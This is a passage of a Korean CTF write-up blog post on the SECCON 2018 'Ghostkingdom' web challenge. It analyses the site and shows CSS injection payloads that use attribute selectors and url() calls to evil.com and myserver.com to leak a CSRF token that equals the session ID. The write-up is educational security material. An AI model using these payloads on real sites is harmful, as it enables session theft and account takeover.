<!DOCTYPE html>
<html lang=KR>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="First writeup, ghostkingdom, which was a web problem in seccon ctf 2018 qual">
<meta name="keywords" content="webhacking,ctf,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="ghost-kingdom-writeup">
<meta property="og:url" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/index.html">
<meta property="og:site_name" content="metamon chronicle">
<meta property="og:description" content="First writeup, ghostkingdom, which was a web problem in seccon ctf 2018 qual">
<meta property="og:locale" content="KR">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028173744866.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028174119482.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028191748617.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028193155290.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028193627181.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028194054606.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028194054606.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028232246130.png">
<meta property="og:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028233954788.png">
<meta property="og:updated_time" content="2019-01-05T07:24:49.334Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ghost-kingdom-writeup">
<meta name="twitter:description" content="First writeup, ghostkingdom, which was a web problem in seccon ctf 2018 qual">
<meta name="twitter:image" content="http://yoursite.com/2019/01/05/ghost-kingdom-writeup/img/image-20181028173744866.png">
    
    
        
          
              <link rel="shortcut icon" href="../../../../images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="../../../../images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="../../../../images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>ghost-kingdom-writeup</title>
    <!-- styles -->
    <link rel="stylesheet" href="../../../../css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="../../../../css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="../../../../index.html">Home</a></li>
         
          <li><a href="../../../../about/">About</a></li>
         
          <li><a href="../../../../archives/">Writing</a></li>
         
          <li><a href="../../../../categories/">categories</a></li>
         
          <li><a href="../../../../tags/">tags</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="../hello-world/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&text=ghost-kingdom-writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&is_video=false&description=ghost-kingdom-writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ghost-kingdom-writeup&body=Check out this article: http://yoursite.com/2019/01/05/ghost-kingdom-writeup/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&name=ghost-kingdom-writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ghostkingdom-248-point"><span class="toc-number">1.</span> <span class="toc-text">Ghostkingdom (248 point)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-description"><span class="toc-number">1.1.</span> <span class="toc-text">Problem description :</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Website-details"><span class="toc-number">1.2.</span> <span class="toc-text">Website details :</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Login-step"><span class="toc-number">1.2.1.</span> <span class="toc-text">1. Login step :</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Main-menu-action-menu"><span class="toc-number">1.2.2.</span> <span class="toc-text">2. Main menu /?action=menu</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Message-to-admin-action-msgadm-기능-분석"><span class="toc-number">1.2.3.</span> <span class="toc-text">3. Message to admin /?action=msgadm 기능 분석</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS-injection으로-뭘-할-수-있을까…"><span class="toc-number">1.3.</span> <span class="toc-text">CSS injection으로 뭘 할 수 있을까…</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-Taking-a-screenshot-action-sshot"><span class="toc-number">1.3.1.</span> <span class="toc-text">4. Taking a screenshot /?action=sshot</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-결론"><span class="toc-number">1.3.2.</span> <span class="toc-text">5. 결론</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        ghost-kingdom-writeup
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">metamon chronicle</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-01-05T05:59:45.000Z" itemprop="datePublished">2019-01-05</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="../../../../categories/hacking/">hacking</a> › <a class="category-link" href="../../../../categories/hacking/writeup/">writeup</a> › <a class="category-link" href="../../../../categories/hacking/writeup/seccon-2018-qual/">seccon 2018 qual</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="../../../../tags/ctf/">ctf</a>, <a class="tag-link" href="../../../../tags/webhacking/">webhacking</a>, <a class="tag-link" href="../../../../tags/writeup/">writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="Ghostkingdom-248-point"><a href="#Ghostkingdom-248-point" class="headerlink" title="Ghostkingdom (248 point)"></a>Ghostkingdom (248 point)</h1><ul>
<li>css injection &amp; ghostscript vulnerability</li>
<li>References :<ul>
<li>CSS injection :<ul>
<li><a href="https://lud1161.wordpress.com/2018/06/25/cat-chat-google-ctf-2018/" target="_blank" rel="noopener">https://lud1161.wordpress.com/2018/06/25/cat-chat-google-ctf-2018/</a></li>
<li><a href="https://curesec.com/blog/article/blog/Reading-Data-via-CSS-Injection-180.html" target="_blank" rel="noopener">https://curesec.com/blog/article/blog/Reading-Data-via-CSS-Injection-180.html</a></li>
</ul>
</li>
<li>GhostScript Vulnerability<ul>
<li><a href="https://gitlab.com/mahham/ctf/blob/master/2018-twctf/Readme.md#slack-emoji-converter-267-web" target="_blank" rel="noopener">https://gitlab.com/mahham/ctf/blob/master/2018-twctf/Readme.md#slack-emoji-converter-267-web</a></li>
<li><a href="https://www.exploit-db.com/exploits/45243/" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/45243/</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<hr>
<h2 id="Problem-description"><a href="#Problem-description" class="headerlink" title="Problem description :"></a>Problem description :</h2><p><code>http://ghostkingdom.pwn.seccon.jp/FLAG/</code> - This is all.</p>
<p>문제 설명에 주어진 링크 ( /FLAG ) 에 들어가보면 다음과 같이 적혀있다.</p>
<p><code>FLAG is somewhere in this folder.</code></p>
<p>이 시점에서 <code>Remote Code Execution</code> 취약점을 찾아서 <code>ls ./FLAG</code> 를 해야 할 것이라는 생각을 하고서 본격적으로 문제 사이트를 분석하기 시작했다.</p>
<h2 id="Website-details"><a href="#Website-details" class="headerlink" title="Website details :"></a>Website details :</h2><h3 id="1-Login-step"><a href="#1-Login-step" class="headerlink" title="1. Login step :"></a>1. Login step :</h3><img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028173744866.png">
<p>문제 사이트에 들어가보면, Login과 Register를 할 수 있다. 이 시점에서 SQL injection을 시도해 볼 수 있겠지만 일단은 계정을 만들어봤다.</p>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028174119482.png">
<p>Register 단계에서 필터링에 신경을 쓰고 있기도 하고 SQL injection으로는 RCE를 하기 힘들기 때문에, 이 시점에서 이 문제가 SQL injection 일 것이라는 생각은 완전히 접었었다.</p>
<p>정상적으로 user : metamon / pass : qlalfqjsgh 로 만들어서 로그인을 해보자.</p>
<h3 id="2-Main-menu-action-menu"><a href="#2-Main-menu-action-menu" class="headerlink" title="2. Main menu /?action=menu"></a>2. Main menu <code>/?action=menu</code></h3><img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028191748617.png">
<p>로그인에 성공하면 <code>CGISESSID=6396e3e7324ddc73f4d313</code>가 세팅되면서 <code>/?action=menu</code>에 들어가지고, 크게 3가지 기능이 있는 것을 확인할 수 있다.</p>
<ul>
<li>Message to admin : <code>/?action=msgadm</code></li>
<li>Take a screenshot : <code>/?action=sshot</code></li>
<li>Upload image : <code>/?action=???</code></li>
</ul>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- /?action=menu html source의 일부 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">li</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"?action=sshot"</span>&gt;</span>Take a screenshot<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">p</span>&gt;</span><span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">li</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">li</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">s</span>&gt;</span>Upload image<span class="tag">&lt;/<span class="name">s</span>&gt;</span> &amp;nbsp; * Only for users logged in from the local network</span><br><span class="line"><span class="tag">&lt;/<span class="name">li</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>여기서 2가지 사실에 주목할 수 있다.</p>
<ol>
<li>Upload image 기능에 접근하기 위한 url이 지워져있다.</li>
<li>설명에 따르면, local network에서 login한 유저는 <code>/?action=menu</code>에 접근하면 Upload image 기능의 url을 알 수 있을 것이다.</li>
</ol>
<hr>
<p>*Fact 1 : 어떻게든 local network에서 menu에 들어갔을 때의 html 소스를 확인해서, upload image에 해당하는 action 파라미터 값을 알아내야 한다.</p>
<hr>
<p>*시나리오 :</p>
<ol>
<li>우리가 local network에서 login을 한 유저가 된 후에 <code>/?action=menu</code> 에 접근한다.</li>
<li>local network에 있는 다른 유저를 조작해서 <code>/?action=menu</code>에 접근시키고, 그 결과를 우리 서버로 보내도록 한다.</li>
</ol>
<p>마침 첫 번째 메뉴가 <u>Message to admin</u> 이었기 때문에, “local network에 있을 것으로 예상되는” admin user를 대상으로 XSS를 시도해서 2번 시나리오대로 진행을 하려고 했다.</p>
<h3 id="3-Message-to-admin-action-msgadm-기능-분석"><a href="#3-Message-to-admin-action-msgadm-기능-분석" class="headerlink" title="3. Message to admin /?action=msgadm 기능 분석"></a>3. Message to admin <code>/?action=msgadm</code> 기능 분석</h3><p>Main menu에서 message to admin을 클릭하면 <code>/?action=msgadm</code>으로 접근할 수 있다.</p>
<p><strong>/?action=msgadm</strong></p>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028193155290.png">
<p>msgadm에서는 Type과 Message를 정해서 Preview 버튼을 통해 admin한테 보내지는 메시지를 미리 확인할 수 있는 창으로 넘어갈 수 있다.</p>
<p>여기서 Normal 과 Emergency 의 차이를 알아보는 겸, Message에 &lt;, &gt; 등 XSS를 일으킬 수 있는 기호를 넣어서 Preview를 해봤다.</p>
<ul>
<li>Normal</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Type : Normal / Message : &lt;&gt;&quot;&amp;\!</span><br><span class="line">Request Header :</span><br><span class="line">	URL : /?</span><br><span class="line">	Query String Parameters :</span><br><span class="line">		- css :</span><br><span class="line">		- msg : &lt;&gt;&apos;&quot;&amp;\!</span><br><span class="line">		- action : msgadm2</span><br></pre></td></tr></table></figure>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028193627181.png">
<ul>
<li>Emergency</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Type : Emergency / Message : &lt;&gt;&quot;&amp;\!</span><br><span class="line">Request Header :</span><br><span class="line">	URL : /?</span><br><span class="line">	Query String Parameters :</span><br><span class="line">		- css : c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9</span><br><span class="line">		- msg : &lt;&gt;&apos;&quot;&amp;\!</span><br><span class="line">		- action : msgadm2</span><br></pre></td></tr></table></figure>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028194054606.png">
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- Emergency 로 보냈을 때 response의 html source의 일부 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"?"</span> <span class="attr">method</span>=<span class="string">"get"</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">    span &#123;</span></span><br><span class="line"><span class="undefined">      background-color: red;</span></span><br><span class="line"><span class="undefined">      color: yellow;</span></span><br><span class="line"><span class="undefined">    &#125;</span></span><br><span class="line"><span class="undefined">  </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">"msg"</span>&gt;</span>Message: &amp;lt;&amp;gt;'"&amp;amp;\!<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"csrf"</span> <span class="attr">value</span>=<span class="string">"6396e3e7324ddc73f4d313"</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"action"</span> <span class="attr">value</span>=<span class="string">"msgadm3"</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">class</span>=<span class="string">"btn"</span> <span class="attr">value</span>=<span class="string">"Send to admin"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>여기서 주목해야 할 것들은 다음과 같다.</p>
<ul>
<li>Message 부분의 &lt;, &gt; 등의 문자는 잘 escape 됨.</li>
<li>Normal vs Emergency 의 차이 : <code>css=</code> vs <code>css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9</code></li>
<li><code>csrf token == CGISESSID session value</code></li>
</ul>
<p>여기서 <code>c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9</code> 는 전부 alphanumeric이고 hex string은 아니었기에 base64일 것 같았고, 실제로 decode를 해봤더니…</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /bin/usr/python2.7</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">css = <span class="string">"c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9"</span></span><br><span class="line"><span class="keyword">print</span> base64.b64decode(css)</span><br><span class="line">&gt;&gt; <span class="string">'span&#123;background-color:red;color:yellow&#125;'</span></span><br></pre></td></tr></table></figure>
<p>!!!!</p>
<blockquote>
<p><code>/?action=msgadm2&amp;msg=asdf&amp;css={css}</code> 로 GET request를 보내면, html에 <code>&lt;style&gt; base64-decode({css}) &lt;/style&gt;</code> 로 들어간다!</p>
<p>=&gt; CSS Injection!</p>
</blockquote>
<hr>
<p><em>Fact 1 : 어떻게든 local network에서 menu에 들어갔을 때의 html 소스를 확인해서, upload image에 해당하는 action 파라미터 값을 알아내야 한다.</em></p>
<p><em>+ Fact 2 : <code>/?action=msgadm2</code> 에서 CSS Injection이 터질 수 있다!</em></p>
<hr>
<p>다행히도 이전에 Google CTF 2018 Quals - Cat Chat (web) 문제의 <a href="https://lud1161.wordpress.com/2018/06/25/cat-chat-google-ctf-2018/" target="_blank" rel="noopener">writeup</a> 을 통해 css injection를 접한 적이 있어 좀 더 수월히 검색을 해볼 수 있었다.</p>
<h2 id="CSS-injection으로-뭘-할-수-있을까…"><a href="#CSS-injection으로-뭘-할-수-있을까…" class="headerlink" title="CSS injection으로 뭘 할 수 있을까…"></a>CSS injection으로 뭘 할 수 있을까…</h2><p>CSS injection을 통해서 할 수 있는 것은 대표적으로 다음과 같은 것들이 있다.</p>
<ol>
<li>span{background: url(“<a href="http://myserver.com&quot;)}" target="_blank" rel="noopener">http://myserver.com&quot;)}</a> 로 내 서버로 보내버리기 : 큰 의미 X</li>
<li>css injection이 터지는 페이지의 html tag, tag의 attribute 등을 읽기 : 이걸로 해보자!</li>
</ol>
<p>자세한 것은 <a href="https://curesec.com/blog/article/blog/Reading-Data-via-CSS-Injection-180.html" target="_blank" rel="noopener">이 블로그</a>에 잘 나와있다. 블로그에 따르면 다음과 같은 방법으로 2번 방법을 수행할 수 있다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">  #form2 input[value^='a'] &#123; background-image: url(http://localhost/log.php/a); &#125;</span></span><br><span class="line"><span class="undefined">  #form2 input[value^='b'] &#123; background-image: url(http://localhost/log.php/b); &#125;</span></span><br><span class="line"><span class="undefined">  #form2 input[value^='c'] &#123; background-image: url(http://localhost/log.php/c); &#125;</span></span><br><span class="line"><span class="undefined">  [...]</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://example.com"</span> <span class="attr">id</span>=<span class="string">"form2"</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">id</span>=<span class="string">"secret"</span> <span class="attr">name</span>=<span class="string">"secret"</span> <span class="attr">value</span>=<span class="string">"abc"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>css에서 패턴 매칭을 통해 특정 tag마다 style을 지정해주는 것을 이용하면, 위와 같은 css 코드를 통해 특정 조건을 만족하는 tag의 존재 여부를 알아낼 수 있다.</p>
<p>실제로 위의 코드는 css 코드를 통해 \&lt;input> 태그의 value의 첫 글자를 알아냈고, 이를 반복하면 최종적으로 value의 모든 글자를 알아낼 수 있다.</p>
<p>CSS injection이 터지는 <code>/?action=msgadm2</code> 의 html 소스를 다시 보자.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"?"</span> <span class="attr">method</span>=<span class="string">"get"</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">    span &#123;</span></span><br><span class="line"><span class="undefined">      background-color: red;</span></span><br><span class="line"><span class="undefined">      color: yellow;</span></span><br><span class="line"><span class="undefined">    &#125;</span></span><br><span class="line"><span class="undefined">  </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">"msg"</span>&gt;</span>Message: &amp;lt;&amp;gt;'"&amp;amp;\!<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"csrf"</span> <span class="attr">value</span>=<span class="string">"6396e3e7324ddc73f4d313"</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"action"</span> <span class="attr">value</span>=<span class="string">"msgadm3"</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">class</span>=<span class="string">"btn"</span> <span class="attr">value</span>=<span class="string">"Send to admin"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>CSS injection을 통해서 읽을 만한 값은 <code>csrf=6396e3e7324ddc73f4d313</code> 정도인데, 이 사이트는 <del>신기하게도</del> csrf token 값과 CGISESSID 값이 같으므로…? <del>(제발 이렇게 짜지 말고 hash 씁시다)</del></p>
<ul>
<li>해당 페이지에 접근하는 유저의 CSRF token 값을 CSS injection을 통해 뺏을 수 있고, 이는 곳 그 유저의 session id 와 같다!</li>
</ul>
<p>이를 위해 inject 해야 하는 CSS payloads와, 편의를 위한 payload generator는 다음과 같다.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">Leak 1st character of csrf token. </span></span><br><span class="line"><span class="comment">Notice : CSRF token is hex-encoded string, therefore it is [0-9a-f]*)</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">  input[value^='0'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://myserver.com/0');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  ... input[value^='9'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://myserver.com/9');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  input[value^='a'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://myserver.com/a');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  ... input[value^='f'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://myserver.com/f');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">Leak 2st character of csrf token, where 1st character was '6'</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="undefined">  input[value^='60'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://evil.com/0');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  ... input[value^='69'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://evil.com/9');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  input[value^='6a'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://evil.com/a');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined">  ... input[value^='6f'] &#123;</span></span><br><span class="line"><span class="undefined">    background-image: url('http://evil.com/f');</span></span><br><span class="line"><span class="undefined">  &#125;</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>
